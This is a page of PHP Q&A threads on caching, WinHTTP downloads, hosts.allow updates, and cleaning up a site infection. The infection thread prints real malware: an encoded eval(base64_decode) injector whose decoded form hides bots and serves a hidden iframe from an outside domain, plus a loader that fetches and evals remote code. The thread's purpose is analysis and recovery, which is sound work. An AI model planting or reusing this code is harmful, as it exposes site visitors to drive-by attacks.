Fault-tolerant file_get_contents - php

I have a website with the following architecture:
End user ---> Server A (PHP) ---> Server B (ASP.NET & Database)
web file_get_contents
browser
Server A is a simple web server, mostly serving static HTML pages. However, some content is dynamic, and this content is fetched from Server B. Example:
someDynamicPageOnServerA.php:
<html>
...static stuff...
<?php echo file_get_contents("http://serverB/somePage.aspx?someParameter"); ?>
...more static stuff...
</html>
This works fine. However, if server B is down (maintainance, unexpected crash, etc.), those dynamic pages on server A will fail. Thus, I'd like to
cache the last result of file_get_contents and
show this result if file_get_contents timeouted.
Now, it shouldn't be too hard to implement something like this; however, this seems to be a common scenario and I'd like to avoid re-inventing the wheel. Is there some PHP library or built-in feature that helps which such a scenario?

i would do something like this:
function GetServerStatus($site, $port){
$fp = #fsockopen($site, $port, $errno, $errstr, 2);
if (!$fp) {
return false;
} else {
return true;
}
}
$tempfile = '/some/temp/file/path.txt';
if(GetServerStatus('ServerB',80)){
$content = file_get_contents("http://serverB/somePage.aspx?someParameter");
file_put_contents($tempfile,$content);
echo $content;
}else{
echo file_get_contents($tempfile);
}

You could check the modified time of the file and only request it when it is different, otherwise load the local copy. Also, there is a cache pseudo-example on the PHP website in the comments for filemtime ( from: http://php.net/manual/en/function.filemtime.php ):
<?php
$cache_file = 'URI to cache file';
$cache_life = '120'; //caching time, in seconds
$filemtime = #filemtime($cache_file); // returns FALSE if file does not exist
if (!$filemtime or (time() - $filemtime >= $cache_life)){
ob_start();
resource_consuming_function();
file_put_contents($cache_file,ob_get_flush());
}else{
readfile($cache_file);
}
?>

I accepted dom's answer, since it was the most helpful one. I ended up using a slightly different approach, since I wanted to account for the situation where the server is reachable via port 80 but some other problem prevents it from serving the requested information.
function GetCachedText($url, $cachefile, $timeout) {
$context = stream_context_create(array(
'http' => array('timeout' => $timeout))); // set (short) timeout
$contents = file_get_contents($url, false, $context);
$status = explode(" ", $http_response_header[0]); // e.g. HTTP/1.1 200 OK
if ($contents === false || $status[1] != "200") {
$contents = file_get_contents($cachefile); // load from cache
} else {
file_put_contents($cachefile, $contents); // update cache
}
return $contents;
}

Related

Characters being dropped retrieving files from simple php service using WinHttpReadData

I have a simple php service set up on a IIS web server. It is used by my client to retrieve files from the server. It looks like this:
<?php
if (isset($_GET['file']))
{
$filepath = "C:\\files\\" . $_GET['file'];
if (!strpos(pathinfo($filepath, PATHINFO_DIRNAME), "..") && file_exists($filepath) && !is_dir($filepath))
{
set_time_limit(0);
$fp = #fopen($filepath, "rb");
while(!feof($fp))
{
print(#fread($fp, 1024*8));
ob_flush();
flush();
}
}
else
{
echo "ERROR at www.testserver.com\r\n";
}
exit;
}
?>
I retrieve the files using WinHttp's WinHttpReadData in C++.
EDIT #2: Here is the C++ code. This is not exactly how it appears in my program. I had to pull pieces from multiple classes, but the gist should be apparent.
session = WinHttpOpen(appName.c_str(), WINHTTP_ACCESS_TYPE_NO_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (session) connection = WinHttpConnect(session, hostName.c_str(), INTERNET_DEFAULT_HTTP_PORT, 0);
if (connection) request = WinHttpOpenRequest(connection, NULL, requestString.c_str(), NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
bool results = false;
if (request)
{
results = (WinHttpSendRequest(request, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0) != FALSE);
}
if (results)
{
results = (WinHttpReceiveResponse(request, NULL) != FALSE);
}
DWORD bytesCopied = 0;
DWORD size = 0;
if (results)
{
do {
results = (WinHttpQueryDataAvailable(request, &size) != FALSE);
if (results)
{
// More available data?
if (size > 0)
{
// Read the Data.
size = min(bufferSize, size);
ZeroMemory(buffer, size);
results = (WinHttpReadData(request, (LPVOID)buffer, size, &bytesCopied) != FALSE);
}
}
if (bytesCopied > 0 && !SharedShutDown.GetValue())
{
tempFile.write((PCHAR)RequestBuffer, bytesCopied);
if (tempFile.fail())
{
tempFile.close();
return false;
}
fileBytes += bytesCopied;
}
} while (bytesCopied > 0 && !SharedShutDown.GetValue());
}
Everything works fine when I test (thousands of files) over the local network using the server computer name from either a Windows 7 or Windows 10 machine. It also works fine when I access the service over the internet from a Windows 7 machine. However, when I run the client on a Windows 10 machine accessing over the internet, I get dropped characters. The interesting thing is that it is a specific set of characters that gets dropped every time from XML files. (Other, binary, files are affected as well, but I have not yet determined what changes in them.)
If the XML file contains an element starting with "<Style", that text disappears. So, this:
<Element1>blah blah</Element1>
<Style_Element>hoopa hoopa</Style_Element>
<Element2>bip bop bam</Element2>
becomes this:
<Element1>blah blah</Element1>
_Element>hoopa hoopa</Style_Element>
<Element2>bip bop bam</Element2>
Notice that the beginning of the style element is chopped off. This is the only element that is affected, and it seems to only affect the first one if there are more than one in the file.
What perplexes me is why this doesn't happen running the client from Windows 7.
EDIT: Some of the other files, binary and text, are missing from 1 to 3 characters each. It seems that a drop only happens once in a file. The rest of the contents of the file are identical to the source.
I can't make sense of the above read routine, it is also incomplete. Just keep it simple like the example below.
The fact that you are having problems with binary files suggest you are not opening the output tempFile in binary mode.
std::ofstream tempFile(filename, std::ios::binary);
while(WinHttpQueryDataAvailable(request, &size) && size)
{
std::string buf(size, 0);
WinHttpReadData(request, &buf[0], size, &bytesCopied);
tempFile.write(buf.data(), bytesCopied);
}
Your php file can be simplified as follows:
<?php
readfile('whatever.bin');
?>
I solved the problem, it seems. My php service did not include header information (didn't think I needed it), so I figured I would try adding a header specification for content type application/octet-stream just to see what would result. My updated service looked like this:
if (isset($_GET['file']))
{
$filepath = "C:\\Program Files (Unrestricted)\\Sony Online Entertainment\\Everquest Yarko Client\\" . $_GET['file'];
if (!strpos(pathinfo($filepath, PATHINFO_DIRNAME), "..") && file_exists($filepath) && !is_dir($filepath))
{
header("Content-Type:application/octet-stream");
set_time_limit(0);
$fp = #fopen($filepath, "rb");
while(!feof($fp))
{
print(#fread($fp, 1024*8));
ob_flush();
flush();
}
}
else
{
echo "ERROR at www.lewiefitz.com\r\n";
}
exit;
}
Now, the files download without any corruption. Why I need such a header in this situation is beyond me. What part of the system is messing with the response message before it ended up in my buffer? I don't know.

Automatically create cache file with php

I have been using a basic caching system on my site based on this link
It has so far worked well for everthing I want to do.
$cachefile = 'cache/'. basename($_SERVER['QUERY_STRING']) . '.html';
$cachetime = 1440 * 60;
if (file_exists($cachefile) && (time() - $cachetime < filemtime($cachefile))) {
include($cachefile);
echo "<!-- Cached ".date('jS F Y H:i', filemtime($cachefile))." -->";
exit;
}
ob_start();
// My html/php code here
$fp = fopen($cachefile, 'w'); // open the cache file for writing
fwrite($fp, ob_get_contents()); // save the contents of output buffer to the file
fclose($fp); // close
ob_end_flush(); // Send to browser
However I have a couple of pages with more detailed mysql queries, I have spent a fair bit of time optimising it however it still takes about 10 secs to run when I query it in mysql and even longer on the website. And sometimes it seems to time out as I get the below message.
The proxy server received an invalid response from an upstream server.
The proxy server could not handle the requestGET http://www.example.com
Reason: Error reading from remote server
This isn't a huge issue as because I am using the caching system above only the first person to click on it for the day gets the delay and the rest of the time the users get the cached page so it is actually quite fast for them.
I want to save myself from having to be the first person each day to go to the page and automate this process so at 17:00 (on the server) each day the file gets written to the cache.
How would I best achieve this?
I suggest you to use Php Speedy or this may help:
<?php
function getUrl () {
if (!isset($_SERVER['REQUEST_URI'])) {
$url = $_SERVER['REQUEST_URI'];
} else {
$url = $_SERVER['SCRIPT_NAME'];
$url .= (!empty($_SERVER['QUERY_STRING']))? '?' . $_SERVER[ 'QUERY_STRING' ] : '';
}
return $url;
}
//getUrl gets the queried page with query string
function cache ($buffer) { //page's content is $buffer
$url = getUrl();
$filename = md5($url) . '.cache';
$data = time() . '¦' . $buffer;
$filew = fopen("cache/" . $filename, 'w');
fwrite($filew, $data);
fclose($filew);
return $buffer;
}
function display () {
$url = getUrl();
$filename = md5($url) . '.cache';
if (!file_exists("/cache/" . $filename)) {
return false;
}
$filer = fopen("cache/" . $filename, 'r');
$data = fread($filer, filesize("cache/" . $filename));
fclose($filer);
$content = explode('¦', $data, 2);
if (count($content)!= 2 OR !is_numeric($content['0'])) {
return false;
}
if (time()-(100) > $content['0']) { // 100 is the cache time here!!!
return false;
}
echo $content['1'];
die();
}
// Display cache (if any)
display(); // if it is displayed, die function will end the program here.
// if no cache, callback cache
ob_start ('cache');
?>
Just include this script anywhere you need caching and set a cron job for running it automated.

Replace drops characters

I have a script i use that checks an IP address stored within my hosts.allow file against what IP is mapped to my dyndns hostname so i can log into my servers once i've synced my current IP to that hostname. For some reason though the script seems to cause really intermittent issues.
within my hosts.allow file i have a section like this:
#SOme.gotdns.com
sshd : 192.168.0.1
#EOme.gotdns.com
#SOme2.gotdns.com
sshd : 192.168.0.2
#EOme2.gotdns.com
I have a script running on a cron (every minute) that looks like this:
#!/usr/bin/php
<?php
$hosts = array('me.gotdns.com','me2.gotdns.com');
foreach($hosts as $host)
{
$ip = gethostbyname($host);
$replaceWith = "#SO".$host."\nsshd : ".$ip."\n#EO".$host;
$filename = '/etc/hosts.allow';
$handle = fopen($filename,'r');
$contents = fread($handle, filesize($filename));
fclose($handle);
if (preg_match('/#SO'.$host.'(.*?)#EO'.$host.'/si', $contents, $regs))
{
$result = $regs[0];
}
if($result != $replaceWith)
{
$newcontents = str_replace($result,$replaceWith,$contents);
$handle = fopen($filename,'w');
if (fwrite($handle, $newcontents) === FALSE) {
}
fclose($handle);
}
}
?>
The problem i have is that intermittently characters are being dropped (i assume during the replace) that causes future updates to fail as it inserts something like:
#SOme.gotdns.com
sshd : 192.168.0.1
#EOme.gotdn
note the missing "s.com"
This of course means i lose access to the server, any ideas why this would be happening?
Thanks.
that might be because of script execution time - can be too short- OR 1 min interval is too short. While cron is doing the job, another process of script starts and it may effect the first one.
This is almost certainly because the script hasn't finished executing within the one minute time period before it's started again via cron. You need to implement some sort of locking, or use a tool that only allows once instance of the script to be run. There are several tools available out there that can do this, for example lockrun.
I would say that in order to do this safely, you should acquire an exclusive lock on the file at the beginning of the script, read it all into memory once, modify it in memory, then write it back to the file at the end. This would also be considerably more efficient in terms of disk I/O.
You should also alter the cron job to run less frequently. It is likely that the reason you currently have this problem is because two processes are running at the same time - by locking the file, if this is the case, you risk having the processes stack up waiting to acquire a lock. Setting it for every 5 minutes should be good enough - your IP shouldn't change that often!
So do this (FIXED):
#!/usr/bin/php
<?php
// Settings
$hosts = array(
'me.gotdns.com',
'me2.gotdns.com'
);
$filename = '/etc/hosts.allow';
// No time limit (shouldn't be necessary with CLI, but just in case)
set_time_limit(0);
// Open the file in read/write mode and lock it
// flock() should block until it gets a lock
if ((!$handle = fopen($filename, 'r+')) || !flock($handle, LOCK_EX)) exit(1);
// Read the file
if (($contents = fread($handle, filesize($filename)) === FALSE) exit(1);
// Will be set to true if we actually make any changes to the file
$changed = FALSE;
// Loop hosts list
foreach ($hosts as $host) {
// Get current IP address of host
if (($ip = gethostbyname($host)) == $host) continue;
// Find the entry in the file
$replaceWith = "#SO{$host}\nsshd : {$ip}\n#EO{$host}";
if (preg_match("/#SO{$host}(.*?)#EO{$host}/si", $contents, $regs)) {
// Only do this if there was a match - otherise risk overwriting previous
// entries because you didn't reset the value of $result
if ($regs[0] != $replaceWith) {
$changed = TRUE;
$contents = str_replace($regs[0], $replaceWith, $contents);
}
}
}
// We'll only change the contents of the file if the data changed
if ($changed) {
ftruncate($handle, 0); // Zero the length of the file
rewind($handle); // start writing from the beginning
fwrite($handle, $contents); // write the new data
}
flock($handle, LOCK_UN); // Unlock
fclose($handle); // close

webpage caching

I am looking for a best solution for caching my webpages example http:/www.website.com/test.php?d=2011-11-01 which has url rewrite rule to become http:/www.website.com/testd-2011-11-01.html
the scripts below does not work for dynamic web page it give the same page regardless of the query.
<?php
$cachefile = "cache/".$reqfilename.".html";
$cachetime = 240 * 60; // 5 minutes
// Serve from the cache if it is younger than $cachetime
if (file_exists($cachefile) && (time() - $cachetime
< filemtime($cachefile)))
{
include($cachefile);
echo "<!-- Cached ".date('jS F Y H:i', filemtime($cachefile))."
-->";
exit;
}
ob_start(); // start the output buffer?>
my website content here
<?php
// open the cache file for writing
$fp = fopen($cachefile, 'w');
// save the contents of output buffer to the file
fwrite($fp, ob_get_contents());
// close the file
fclose($fp);
// Send the output to the browser
ob_end_flush(); ?>
If your URL looks like testd-2011-11-01.html, you have two possible solutions :
Use some RewriteRule, so that URL is rewritten to test.php?d=2011-11-01 ; and, then, your test.php script can deal with the cache generation / invalidation
Or use a cronjob, that will regenerate the testd-2011-11-01.html static file every X minutes.
The first solution is the one that's generally used, as it only requires you to setup a RewriteRule (and those are often available, even on cheap hosting services).
The second solution might be a bit better for performances (no PHP code is ever executed, except when the cronjob runs) ; but the difference is probably not that important, except if you have a very big website with an awful lot of users.
Something like this could work:
class SimpleCache {
private $_cacheDir = '/path/to/cache';
private $_cacheTime = 240*60;
public function isCached( $id ) {
$cacheFilename = $this->_cache . "/" . $id . "_*";
$files = glob($cacheFilename, GLOB_NOSORT);
if( $files && !empty($files) ) {
// There should always be one file in the array
$filename = $files[0];
$params = explode("_", $filename);
$cacheTime = strtok($params[1], '.');
// Check if the cached file is too old
if( time() - $params[1] > $this->_cacheTime ) {
#unlink($filename);
}
else {
return $filename;
}
}
return false;
}
public function cache( $id, $data ) {
$filename = $this->_cache . "/" . $id. "_" . time() . ".cache";
if( !($fp = #fopen($filename, "w")) ) {
return false;
}
if( !#fwrite($fp, $data) ) {
#fclose($fp);
return false;
}
#fclose($fp);
return true;
}
}
$cache = new SimpleCache();
if( !($buffer = $cache->isCached($reqfilename)) ) {
// Produce the contects of the file and save them in the $buffer variable
$cache->cache($reqfilename, $buffer);
}
echo $buffer;
But you could use memcached, APC, and more advanced caching techniques if you are up to it
You can use HTTP caching. You send headers telling the client (browser) to cache the whole page for a certain period of time.
// 5 minutes
header('Cache-Control: max-age=300');
If you have control over your hosting environment, you can also add a reverse proxy like varnish or nginx in front of your webserver. This proxy will then cache these requests for you, making the cached version shared between all visitors of your site.
See also the HTTP/1.1 specification.

How to get rid of eval-base64_decode like PHP virus files?

My site (very large community website) was recently infected with a virus. Every index.php file was changed so that the opening php tag of these files it was changed to the following line:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
When I decoded this, it produced the following PHP code:
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
I've tried several things to clean the virus even restoring from a backup and the files get re-infected after a few minutes or hours. So can you please help me?
What do you know about this virus?
Is there a known security hole it uses to install and propagate?
What does the above php code actually does?
What does the page it embeds in the iframe does?
And of course more importantly: What can i do to get rid of it?
Please help, we have been almost run out of ideas and hope :(
UPDATE1
Some more details: A weird thing is: When we first checked the infected files. They were changed but their modified time in the ftp program was showing last access to be days, months or even years ago in some cases! How is this even possible? It drives me crazy!
UPDATE 2
I think the problem initiated after a user installed a plugin in his Wordpress installation. After restoring from backup and completely deleting the Wordpress folder and the associated db the problem seems gone. We have currently subscribed to a security service and they are investigating the issue just to be sure the hack is gone for good. Thanks for anyone who replied.
Steps to recover and disinfect your site (provided you have a known good backup).
1) Shutdown the Site
You need to basically close the door to your site before you do your remedial work. This will prevent visitors getting malicious code, seeing error messages, etc. Just good practice.
You should be able to do this by putting the following into your .htaccess file in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.com if you don't know your IP address.)
order deny,allow
deny from all
allow from !!Your IP Address Here!!
2) Download a Copy of All of your Files from the Server
Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).
3) Download and Install a File/Folder Comparison Utility
On a Windows machine, you can use WinMerge - http://winmerge.org/ - it's free and quite powerful.
On a MacOS machine, check out the list of possible alternates from Alternative.to
4) Run the File/Folder Comparison Utility
You should end up with a few different results:
Files are Identical - The current file is the same as your backup, and so is unaffected.
File on Left/Right Side Only - That file either only exists in the backup (and may have been deleted from the server), or only exists on the server (and may have been injected/created by the hacker).
File is Different - The file on the server is not the same as the one in the backup, so it may have been modified by you (to configure it for the server) or by the hacker (to inject code).
5) Resolve the Differences
(a.k.a "Why can't we all just get along?")
For Files which are Identical, no further action is required.
For Files which Exist on One Side Only, look at the file and figure out whether they are legitimate (ie user uploads which should be there, additional files you may have added, etc.)
For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.
6) Review your Security Precautions
Whether this is as simple as changing your FTP/cPanel Passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing alot of fgets, fopens, etc. you may want to check the parameters being passed to them as that is a way to make scripts pull in malicious code), etc.
7) Check the Site Works
Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.
8) Open the Doors
Reverse the changes made in the .htaccess file in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.
9) Consider Automated Detection Methods
There are a few solutions, allowing for you to have an automated check performed on your host (using a CRON job) which will detect and detail any changes which occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:
Tripwire - a PHP script to detect and report new, deleted or modified files
Shell script to monitor file changes
How to detect if your webserver is hacked and get alerted
10) Have Scheduled Backups, and Retain a Good Bracket
Make sure you have scheduled backups performed on your website, keep a few of them, so you have different steps you can go back in time, if necessary. For instance, if you performed weekly backups, you might want to keep the following:
4 x Weekly Backups
4 x Monthly Backups (you retain one of the Weekly Backups, maybe the first week of the month, as the Monthly Backup)
These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.
Oh, and ensure you backup your databases too - with alot of sites being based on CMSes, having the files is nice, but if you lose/corrupt the database behind them, well, the backups are basically useless.
I suffered from the same hack job. I was able to decrypt the code as well, and while I got different php code, I started by removing the injected php text by looping through each php file in the site and removing the eval call. I am still investigating how I got it to begin with but here is what mine looked like after decrypting from this website:
To decode the encrypted php script on each php file use this:
http://www.opinionatedgeek.com/dotnet/tools/base64decode/
And formatting the result using this guy:
http://beta.phpformatter.com/
To clean you need to remove the "eval" line from the top of each php file, and delete the .log folders from the base folder of the website.
I found a python script which I modified slightly to remove the trojan in php files so I will post it here for others to use:
code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree
import os
import re
import sys
def try_to_replace(fname):
if replace_extensions:
return fname.lower().endswith(".php")
return True
def file_replace(fname, pat, s_after):
# first, see if the pattern is even in the file.
with open(fname) as f:
if not any(re.search(pat, line) for line in f):
return # pattern does not occur in file so we are done.
# pattern is in the file, so perform replace operation.
with open(fname) as f:
out_fname = fname + ".tmp"
out = open(out_fname, "w")
for line in f:
out.write(re.sub(pat, s_after, line))
out.close()
os.rename(out_fname, fname)
def mass_replace(dir_name, s_before, s_after):
pat = re.compile(s_before)
for dirpath, dirnames, filenames in os.walk(dir_name):
for fname in filenames:
if try_to_replace(fname):
print "cleaning: " + fname
fullname = os.path.join(dirpath, fname)
file_replace(fullname, pat, s_after)
if len(sys.argv) != 2:
u = "Usage: rescue.py <dir_name>\n"
sys.stderr.write(u)
sys.exit(1)
mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")
to use type
python rescue.py rootfolder
This is what the malicious script was trying to do:
<?php
if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (!function_exists('mrobh')) {
function get_tds_777($url)
{
$content = "";
$content = #trycurl_777($url);
if ($content !== false)
return $content;
$content = #tryfile_777($url);
if ($content !== false)
return $content;
$content = #tryfopen_777($url);
if ($content !== false)
return $content;
$content = #tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = #trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777($url)
{
if (function_exists('file') === false)
return false;
$inc = #file($url);
$buf = #implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = #fopen($url, 'r');
if ($f) {
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = #fsockopen($host, 80, $errno, $errstr, 30);
if (!$f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (!feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function trysocket_777($url)
{
if (function_exists('socket_create') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = #gethostbyname($host);
$ip2 = #long2ip(#ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = #socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!#socket_connect($sock, $ip1, 80)) {
#socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
#socket_close($sock);
if ($buf == "")
return false;
list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
return $buf;
}
function update_tds_file_777($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (#file_exists($tdsfile)) {
$mtime = #filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = #file_get_contents($tdsfile);
}
} else {
